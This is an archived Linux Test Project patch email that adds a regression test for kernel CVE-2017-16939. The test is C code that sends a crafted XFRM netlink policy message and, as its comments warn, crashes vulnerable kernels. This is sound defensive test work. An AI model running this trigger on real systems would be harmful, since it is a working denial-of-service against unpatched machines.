From patchwork Fri Mar 9 12:34:37 2018 Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit X-Patchwork-Submitter: Michael Moese X-Patchwork-Id: 883595 Return-Path: X-Original-To: incoming@patchwork.ozlabs.org Delivered-To: patchwork-incoming@bilbo.ozlabs.org Authentication-Results: ozlabs.org; spf=pass (mailfrom) smtp.mailfrom=lists.linux.it (client-ip=213.254.12.146; helo=picard.linux.it; envelope-from=ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it; receiver=) Authentication-Results: ozlabs.org; dmarc=none (p=none dis=none) header.from=suse.de Received: from picard.linux.it (picard.linux.it [213.254.12.146]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by ozlabs.org (Postfix) with ESMTPS id 3zyRfG6Qrfz9s2B for ; Fri, 9 Mar 2018 23:34:44 +1100 (AEDT) Received: from picard.linux.it (localhost [IPv6:::1]) by picard.linux.it (Postfix) with ESMTP id 11F6C3E749B for ; Fri, 9 Mar 2018 13:34:42 +0100 (CET) X-Original-To: ltp@lists.linux.it Delivered-To: ltp@picard.linux.it Received: from in-6.smtp.seeweb.it (in-6.smtp.seeweb.it [217.194.8.6]) by picard.linux.it (Postfix) with ESMTP id D4D1C3E71AB for ; Fri, 9 Mar 2018 13:34:40 +0100 (CET) Received: from mx2.suse.de (mx2.suse.de [195.135.220.15]) (using TLSv1 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by in-6.smtp.seeweb.it (Postfix) with ESMTPS id 599631401AA4 for ; Fri, 9 Mar 2018 13:34:38 +0100 (CET) Received: from relay1.suse.de (charybdis-ext.suse.de [195.135.220.254]) by mx2.suse.de (Postfix) with ESMTP id 9FB90ACBE for ; Fri, 9 Mar 2018 12:34:38 +0000 (UTC) From: Michael Moese To: ltp@lists.linux.it Date: Fri, 9 Mar 2018 13:34:37 +0100 Message-Id: <20180309123437.30025-1-mmoese@suse.de> X-Mailer: git-send-email 2.13.6 X-Virus-Scanned: clamav-milter 0.99.2 at in-6.smtp.seeweb.it X-Virus-Status: Clean X-Spam-Status: No, score=-0.0 required=7.0 tests=SPF_PASS, T_RP_MATCHES_RCVD autolearn=disabled version=3.4.0 X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on in-6.smtp.seeweb.it Subject: [LTP] [PATCH v2] Add regression test for CVE-2017-16939 X-BeenThere: ltp@lists.linux.it X-Mailman-Version: 2.1.18 Precedence: list List-Id: Linux Test Project List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , MIME-Version: 1.0 Errors-To: ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it Sender: "ltp" Based on the reproducing code from Mohammed Ghannam, published on https://blogs.securiteam.com/index.php/archives/3535 Warning! If the kernel is vulnerable to this CVE, it will definitely die. So do not run this on a production machine! Signed-off-by: Michael Moese --- Changes to v1: v1 was copied from the original reproducer. This v2 now simplified things, like not using any fork() and only allocating memory in the setup(). In addition, the many small functions were merged into still rather short setup() and run(). --- runtest/cve | 1 + testcases/cve/.gitignore | 1 + testcases/cve/cve-2017-16939.c | 89 ++++++++++++++++++++++++++++++++++++++++++ 3 files changed, 91 insertions(+) create mode 100644 testcases/cve/cve-2017-16939.c diff --git a/runtest/cve b/runtest/cve index 0c385c670..78799e2ff 100644 --- a/runtest/cve +++ b/runtest/cve @@ -30,3 +30,4 @@ cve-2017-17807 request_key04 cve-2017-1000364 stack_clash cve-2017-5754 meltdown cve-2017-17052 cve-2017-17052 +cve-2017-16939 cve-2017-16939 diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore index c878069f1..f813e56ed 100644 --- a/testcases/cve/.gitignore +++ b/testcases/cve/.gitignore @@ -12,3 +12,4 @@ cve-2017-5669 meltdown stack_clash cve-2017-17052 +cve-2017-16939 diff --git a/testcases/cve/cve-2017-16939.c b/testcases/cve/cve-2017-16939.c new file mode 100644 index 000000000..a49499cf7 --- /dev/null +++ b/testcases/cve/cve-2017-16939.c @@ -0,0 +1,89 @@ +/* + * Copyright (c) 2018 Michael Moese + * + * This program is free software: you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation, either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program. If not, see . + */ +/* Regression test for CVE-2017-16939 + * based on the reproducing code from Mohammed Ghannam, published on + * https://blogs.securiteam.com/index.php/archives/3535 + * + * CAUTION! If your system is vulnerable to this CVE, the kernel + * WILL DIE! + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "tst_test.h" +#include "tst_res_flags.h" +#include "tst_safe_macros.h" +#include "tst_safe_net.h" + +#define BUFSIZE 2048 + +static int fd; +static struct sockaddr_nl addr; + +struct msg_policy { + struct nlmsghdr msg; + char buf[BUFSIZE]; +}; +static struct msg_policy *p; + +static void setup(void) +{ + if (unshare(CLONE_NEWUSER) != 0) + tst_brk(TCONF, "unshare(CLONE_NEWUSER) failed"); + if (unshare(CLONE_NEWNET) != 0) + tst_brk(TCONF, "unshare(CLONE_NEWNET) failed"); + + fd = SAFE_SOCKET(PF_NETLINK, SOCK_RAW, NETLINK_XFRM); + memset(&addr, 0, sizeof(struct sockaddr_nl)); + addr.nl_family = AF_NETLINK; + addr.nl_pid = 0; /* packet goes into the kernel */ + addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */ + + p = SAFE_MALLOC(sizeof(struct msg_policy)); + memset(p, 0, sizeof(struct msg_policy)); + + p->msg.nlmsg_len = 0x10; + p->msg.nlmsg_type = XFRM_MSG_GETPOLICY; + p->msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | NLM_F_REQUEST; + p->msg.nlmsg_seq = 0x1; + p->msg.nlmsg_pid = 2; +} + +static void run(void) +{ + int var = 0x100; + + SAFE_SETSOCKOPT(fd, 1, SO_RCVBUF, &var, sizeof(int)); + SAFE_SENDTO(1, fd, (void *) &p->msg, p->msg.nlmsg_len, 0, + (struct sockaddr *) &addr, + sizeof(struct sockaddr_nl)); + + tst_res(TPASS, "Kernel seems to have survived"); +} + +static struct tst_test test = { + .setup = setup, + .test_all = run, +};